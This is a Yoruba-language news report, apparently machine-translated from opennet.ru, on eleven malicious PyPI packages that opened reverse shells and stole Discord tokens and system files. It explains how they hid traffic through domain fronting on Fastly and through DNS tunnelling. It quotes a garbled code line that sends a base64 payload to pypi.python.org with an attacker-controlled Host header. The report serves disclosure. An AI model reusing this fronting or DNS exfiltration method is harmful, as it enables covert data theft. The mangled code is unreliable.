Ninu itọsọna PyPI (Atọka Package Python), awọn akojọpọ 11 ti o ni koodu irira ni idanimọ. Ṣaaju ki o to ṣe idanimọ awọn iṣoro, awọn idii ti ṣe igbasilẹ nipa awọn akoko 38 ẹgbẹrun lapapọ. Awọn idii irira ti a rii jẹ ohun akiyesi fun lilo wọn ti awọn ọna fafa lati tọju awọn ikanni ibaraẹnisọrọ pẹlu awọn olupin awọn ikọlu.
- package pataki (awọn igbasilẹ 6305), idii pataki-package (12897) - iṣeto asopọ kan si olupin itagbangba labẹ itanjẹ ti asopọ si pypi.python.org lati pese ikarahun wiwọle si eto (ikarahun yiyipada) ati lo eto trevorc2 lati tọju ikanni ibaraẹnisọrọ.
- pptest (10001), ipboards (946) - lo DNS bi ikanni ibaraẹnisọrọ lati atagba alaye nipa eto (ninu apo akọkọ orukọ ogun, ilana iṣẹ, IP inu ati ita, ni keji - orukọ olumulo ati orukọ agbalejo) .
- owlmoon (3285), DiscordSafety (557), yiffparty (1859) - ṣe idanimọ ami iṣẹ Discord ninu eto ati firanṣẹ si agbalejo ita.
- trrfab (287) - firanṣẹ idanimọ, orukọ agbalejo ati awọn akoonu ti /etc/passwd, /etc/hosts,/ile si agbalejo ita.
- 10Cent10 (490) - iṣeto asopọ ikarahun yiyipada pẹlu agbalejo ita.
- yandex-yt (4183) - ṣe afihan ifiranṣẹ kan nipa eto ti o gbogun ati darí si oju-iwe kan pẹlu alaye afikun nipa awọn iṣe siwaju ti a gbejade nipasẹ nda.ya.ru (api.ya.cc).
Ti akiyesi pataki ni ọna ti iwọle si awọn ogun ita ti a lo ninu apo pataki ati awọn idii-package pataki, eyiti o lo Nẹtiwọọki ifijiṣẹ akoonu Yara ti a lo ninu itọsọna PyPI lati tọju iṣẹ ṣiṣe wọn. Ni otitọ, awọn ibeere ni a fi ranṣẹ si olupin pypi.python.org (pẹlu sisọ orukọ python.org ni SNI inu ibeere HTTPS), ṣugbọn akọsori HTTP “Olugbalejo” pẹlu orukọ olupin ti iṣakoso nipasẹ awọn ikọlu (aaya. siwaju.io. agbaye.prod.fastly.net). Nẹtiwọọki ifijiṣẹ akoonu firanṣẹ iru ibeere kan si olupin ikọlu, ni lilo awọn aye ti asopọ TLS si pypi.python.org nigba gbigbe data.
Awọn amayederun PyPI ni agbara nipasẹ Nẹtiwọọki ifijiṣẹ akoonu Yara, eyiti o nlo aṣoju transparent Varnish si kaṣe awọn ibeere aṣoju, ati tun nlo sisẹ ijẹrisi TLS ni ipele CDN, dipo awọn olupin ipari, lati firanṣẹ awọn ibeere HTTPS nipasẹ aṣoju kan. Laibikita ibi-afẹde ibi-afẹde, awọn ibeere ni a firanṣẹ si aṣoju, eyiti o pinnu ogun ti o fẹ nipa lilo akọsori HTTP “Gbalejo”, ati awọn orukọ-ašẹ ti a ti so mọ awọn adiresi IP adiresi fifuye CDN ti o jẹ aṣoju fun gbogbo awọn alabara Fastly.
Olupin awọn ikọlu naa tun forukọsilẹ pẹlu CDN Fastly, eyiti o pese awọn ero ọfẹ si gbogbo eniyan ati paapaa gba iforukọsilẹ ailorukọ. O jẹ akiyesi pe lati firanṣẹ awọn ibeere si olufaragba nigbati o ṣẹda “ikarahun yiyipada”, ero kan tun lo, ṣugbọn bẹrẹ lati ẹgbẹ ti agbalejo ikọlu naa. Lati ita, ibaraenisepo pẹlu olupin awọn ikọlu dabi igba to tọ pẹlu itọsọna PyPI, ti paroko nipa lilo ijẹrisi PyPI TLS kan. Ilana ti o jọra, ti a mọ ni “iwaju agbegbe,” ni iṣaaju lo ni itara lati tọju orukọ agbalejo nigbati o ba dena idinamọ, ni lilo agbara ti a pese ni diẹ ninu awọn nẹtiwọọki CDN lati wọle si HTTPS nipasẹ titọkasi agbalejo airotẹlẹ ni SNI ati gbigbe orukọ gangan ti alejo ti o beere ni akọsori HTTP Gbalejo inu igba TLS kan.
Lati tọju iṣẹ irira, package TrevorC2 ni afikun ni lilo lati ṣe ibaraenisepo pẹlu olupin ti o jọra si lilọ kiri wẹẹbu deede, fun apẹẹrẹ, awọn ibeere irira ni a firanṣẹ labẹ itanjẹ gbigba aworan naa “https://pypi.python.org/images/ guid =” pẹlu fifi koodu alaye ni paramita itọsọna. url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload r = ìbéèrè. Ìbéèrè(url, headers = {'Onígbàlejò': "psec.forward.io.global.prod.fastly.net"})
Awọn idii pptest ati ipboards lo ọna ti o yatọ lati tọju iṣẹ nẹtiwọọki, da lori fifi koodu alaye to wulo ni awọn ibeere si olupin DNS. Awọn malware ntan alaye nipa ṣiṣe awọn ibeere DNS bi "nu4timjagq4fimbuhe.example.com", ninu eyiti data ti a firanṣẹ si olupin iṣakoso ti wa ni koodu nipa lilo ọna kika base64 ni orukọ subdomain. Olukọni gba awọn ifiranṣẹ wọnyi nipa ṣiṣakoso olupin DNS fun agbegbe example.com.
orisun: opennet.ru